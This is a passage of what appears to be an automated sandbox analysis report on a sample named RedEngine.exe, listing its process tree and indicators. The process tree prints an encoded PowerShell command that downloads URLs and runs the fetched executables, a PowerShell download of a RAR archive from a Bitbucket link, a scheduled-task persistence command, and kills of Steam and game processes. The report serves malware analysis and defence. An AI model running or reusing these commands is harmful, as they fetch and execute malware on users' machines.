SeIncreaseQuotaPrivilege 2080 svchost.exe Token: SeSecurityPrivilege 2080 svchost.exe Token: SeTakeOwnershipPrivilege 2080 svchost.exe Token: SeLoadDriverPrivilege 2080 svchost.exe Token: SeSystemtimePrivilege 2080 svchost.exe Token: SeBackupPrivilege 2080 svchost.exe Token: SeRestorePrivilege 2080 svchost.exe Token: SeShutdownPrivilege 2080 svchost.exe Token: SeSystemEnvironmentPrivilege 2080 svchost.exe Token: SeUndockPrivilege 2080 svchost.exe Token: SeManageVolumePrivilege 2080 svchost.exe Token: SeDebugPrivilege 184 wmiprvse.exe Token: SeShutdownPrivilege 60 dwm.exe Token: SeCreatePagefilePrivilege 60 dwm.exe Token: SeIncreaseQuotaPrivilege 3876 WMIC.exe Token: SeSecurityPrivilege 3876 WMIC.exe Token: SeTakeOwnershipPrivilege 3876 WMIC.exe Token: SeLoadDriverPrivilege 3876 WMIC.exe Token: SeSystemProfilePrivilege 3876 WMIC.exe Token: SeSystemtimePrivilege 3876 WMIC.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
Explorer.EXEpid process 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE 3448 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3448 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
RedEngine.exepowershell.exej1dicjdx.pjl0.exej1dicjdx.pjl3.execmd.execmd.execmd.execmd.exej1dicjdx.pjl1.exedescription pid process target process PID 2176 wrote to memory of 3944 2176 RedEngine.exe powershell.exe PID 2176 wrote to memory of 3944 2176 RedEngine.exe powershell.exe PID 3944 wrote to memory of 1612 3944 powershell.exe j1dicjdx.pjl0.exe PID 3944 wrote to memory of 1612 3944 powershell.exe j1dicjdx.pjl0.exe PID 3944 wrote to memory of 1612 3944 powershell.exe j1dicjdx.pjl0.exe PID 3944 wrote to memory of 1032 3944 powershell.exe j1dicjdx.pjl1.exe PID 3944 wrote to memory of 1032 3944 powershell.exe j1dicjdx.pjl1.exe PID 3944 wrote to memory of 1032 3944 powershell.exe j1dicjdx.pjl1.exe PID 3944 wrote to memory of 1436 3944 powershell.exe j1dicjdx.pjl2.exe PID 3944 wrote to memory of 1436 3944 powershell.exe j1dicjdx.pjl2.exe PID 3944 wrote to memory of 696 3944 powershell.exe j1dicjdx.pjl3.exe PID 3944 wrote to memory of 696 3944 powershell.exe j1dicjdx.pjl3.exe PID 3944 wrote to memory of 696 3944 powershell.exe j1dicjdx.pjl3.exe PID 1612 wrote to memory of 4036 1612 j1dicjdx.pjl0.exe cmd.exe PID 1612 wrote to memory of 4036 1612 j1dicjdx.pjl0.exe cmd.exe PID 696 wrote to memory of 1828 696 j1dicjdx.pjl3.exe cmd.exe PID 696 wrote to memory of 1828 696 j1dicjdx.pjl3.exe cmd.exe PID 1828 wrote to memory of 4040 1828 cmd.exe where.exe PID 1828 wrote to memory of 4040 1828 cmd.exe where.exe PID 4036 wrote to memory of 3388 4036 cmd.exe chcp.com PID 4036 wrote to memory of 3388 4036 cmd.exe chcp.com PID 1828 wrote to memory of 4048 1828 cmd.exe powershell.exe PID 1828 wrote to memory of 4048 1828 cmd.exe powershell.exe PID 4036 wrote to memory of 2512 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 2512 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 740 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 740 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 5112 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 5112 4036 cmd.exe findstr.exe PID 4036 wrote to memory of 3180 4036 cmd.exe schtasks.exe PID 4036 wrote to memory of 3180 4036 cmd.exe schtasks.exe PID 4036 wrote to memory of 2808 4036 cmd.exe schtasks.exe PID 4036 wrote to memory of 2808 4036 cmd.exe schtasks.exe PID 4036 wrote to memory of 2924 4036 cmd.exe cmd.exe PID 4036 wrote to memory of 2924 4036 cmd.exe cmd.exe PID 2924 wrote to memory of 4840 2924 cmd.exe reg.exe PID 2924 wrote to memory of 4840 2924 cmd.exe reg.exe PID 4036 wrote to memory of 4896 4036 cmd.exe cmd.exe PID 4036 wrote to memory of 4896 4036 cmd.exe cmd.exe PID 4896 wrote to memory of 3496 4896 cmd.exe reg.exe PID 4896 wrote to memory of 3496 4896 cmd.exe reg.exe PID 4036 wrote to memory of 4396 4036 cmd.exe powershell.exe PID 4036 wrote to memory of 4396 4036 cmd.exe powershell.exe PID 1032 wrote to memory of 4516 1032 j1dicjdx.pjl1.exe openwith.exe PID 1032 wrote to memory of 4516 1032 j1dicjdx.pjl1.exe openwith.exe PID 1032 wrote to memory of 4516 1032 j1dicjdx.pjl1.exe openwith.exe PID 1032 wrote to memory of 4516 1032 j1dicjdx.pjl1.exe openwith.exe PID 1032 wrote to memory of 4516 1032 j1dicjdx.pjl1.exe openwith.exe PID 4036 wrote to memory of 5016 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 5016 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 4092 4036 cmd.exe find.exe PID 4036 wrote to memory of 4092 4036 cmd.exe find.exe PID 4036 wrote to memory of 4980 4036 cmd.exe taskkill.exe PID 4036 wrote to memory of 4980 4036 cmd.exe taskkill.exe PID 4036 wrote to memory of 636 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 636 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 384 4036 cmd.exe find.exe PID 4036 wrote to memory of 384 4036 cmd.exe find.exe PID 4036 wrote to memory of 4760 4036 cmd.exe taskkill.exe PID 4036 wrote to memory of 4760 4036 cmd.exe taskkill.exe PID 4036 wrote to memory of 2912 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 2912 4036 cmd.exe tasklist.exe PID 4036 wrote to memory of 5112 4036 cmd.exe find.exe PID 4036 wrote to memory of 5112 4036 cmd.exe find.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"C:\Users\Admin\AppData\Local\Temp\RedEngine.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl0.exe"C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4333.tmp\4334.tmp\4335.bat C:\Users\Admin\AppData\Roaming\j1dicjdx.pjl0.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\chcp.comchcp 12516⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "tf_win64.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im tf_win64.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "dota2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im dota2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "cs2.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im cs2.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RustClient.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RustClient.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "GTA5.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im GTA5.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "TslGame.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im TslGame.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "RainbowSix.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im RainbowSix.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tasklist.exetasklist6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\find.exefind /i "steam.exe"6⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im steam.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exetimeout /t 36⤵
-
C:\Windows\system32\tar.exetar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
